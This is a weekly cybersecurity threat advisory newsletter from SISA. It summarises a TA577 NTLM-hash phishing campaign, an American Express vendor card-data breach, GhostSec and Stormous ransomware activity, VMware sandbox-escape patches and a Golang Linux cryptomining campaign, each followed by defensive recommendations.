American Express issues credit card data breach alert
- SISA Weekly Threat Watch -
Last week’s cybersecurity landscape witnessed a surge in sophisticated threats, including phishing campaigns targeting NTLM hashes, data breaches affecting American Express customers, ransomware collaboration between GhostSec and Stormous, critical security patches from VMware, and a new Linux malware campaign exploiting vulnerabilities in Docker, Apache Hadoop, Redis, and Confluence. Posing significant risks to organizations, these diverse threats emphasize the importance of proactive security measures and regular audits.
SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.
1. TA577 phishing campaign: Stealing NTLM hashes for account hijacks
TA577, a hacking group, has adopted phishing emails to steal NT LAN Manager (NTLM) authentication hashes, employing a new tactic involving ZIP archives containing HTML files that trigger automatic connections to capture hashes. Their recent campaign targeted employees globally, masquerading as replies to previous discussions and including ZIP attachments with crafted HTML files. Upon opening, these files initiate connections to a malicious Server Message Block (SMB) server controlled by the attackers, enabling the capture of NTLM hashes associated with connected devices.
While the phishing emails did not deliver malware payloads, they aimed solely to capture NTLM hashes, with attackers potentially utilizing these hashes in “pass-the-hash” attacks. To mitigate such risks, organizations can block outbound SMB connections and implement email filtering to prevent zipped HTML file-based attacks.
2. American Express warns of credit card exposure in vendor data breach
American Express has warned customers of a data breach involving the exposure of credit card information due to a breach at one of its service providers, impacting some Card Members. The breach, affecting credit card account numbers, names, and expiration dates, occurred at the service provider used by American Express’s travel services division, leading to unauthorized access to customer data.
While the exact number of impacted customers and the identity of the service provider remain unclear, American Express has notified regulatory authorities and is informing affected customers. The company assures that its own systems were not compromised, and customers will not be held responsible for fraudulent charges. To mitigate potential risks, American Express advises customers to monitor their account statements for suspicious activity for the next 12 to 24 months, enable instant notifications through the mobile app, and consider requesting a new card number if their information was stolen.
3. GhostSec and Stormous collaborate on ransomware campaign targeting 15+ countries
GhostSec, a cybercrime group affiliated with The Five Families coalition, has emerged as a significant player in the ransomware landscape, notably with the GhostLocker variant. Collaborating with the Stormous ransomware group, GhostSec conducts double extortion attacks targeting various business verticals across multiple countries. Their latest iteration, GhostLocker 2.0, written in the Go programming language, features enhanced encryption capabilities and a new ransom note urging victims to contact them within a specific timeframe to prevent data leakage.
Additionally, GhostSec has launched a ransomware-as-a-service (RaaS) program called STMX_GhostLocker and developed tools like the GhostSec Deep Scan toolset and GhostPresser for cross-site scripting attacks, targeting victims across various industries in numerous countries. Threats like this underscore the critical need for robust endpoint protection, web scanning, email security, malware analysis tools, and secure internet gateways to mitigate their malicious activities.
4. VMware issues security patches for ESXi, Workstation, and Fusion flaws
VMware has issued critical security updates to address sandbox escape vulnerabilities present in VMware ESXi, Workstation, Fusion, and Cloud Foundation products, posing a significant risk of unauthorized access to host systems or compromising the isolation of other virtual machines. These vulnerabilities, identified as CVE-2024-22252 to CVE-2024-22255, with CVSS v3 scores ranging from 7.1 to 9.3, allow attackers with local administrative privileges on virtual machines to execute code within the VMX process on the host. Notably, CVE-2024-22254 is an out-of-bounds write flaw in ESXi, while CVE-2024-22255 is an information disclosure issue affecting ESXi, Workstation, and Fusion.
VMware advises promptly applying the latest security updates and patches, especially for older ESXi versions (6.7U3u), 6.5 (6.5U3v), and VCF 3.x, and recommends carefully assessing the impact on connectivity when implementing workarounds like removing USB controllers from virtual machines. Additionally, administrators are encouraged to subscribe to the VMSA mailing list for proactive alerts regarding exploitation status changes.
5. Linux malware campaign targets Docker, Apache Hadoop, Redis and Confluence
Cyber attackers are exploiting vulnerabilities in improperly configured servers running Apache Hadoop YARN, Docker, Confluence, or Redis using a new Golang-based malware, leveraging an outdated security flaw in Atlassian Confluence to execute unauthorized code. Cloud forensics experts uncovered the attack, which involved bash scripts and Golang ELF binaries, resembling previous cloud assaults attributed to threat actors like TeamTNT and WatchDog.
The campaign targeted specific ports associated with the aforementioned services, deploying Golang payloads to initiate cryptocurrency mining operations, establish persistence, and execute remote code execution exploits. Despite being detectable by antivirus engines, the Golang binaries for service discovery exhibited minimal detection rates, highlighting the need for regular security audits, patching, and network segmentation to mitigate such threats.
To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.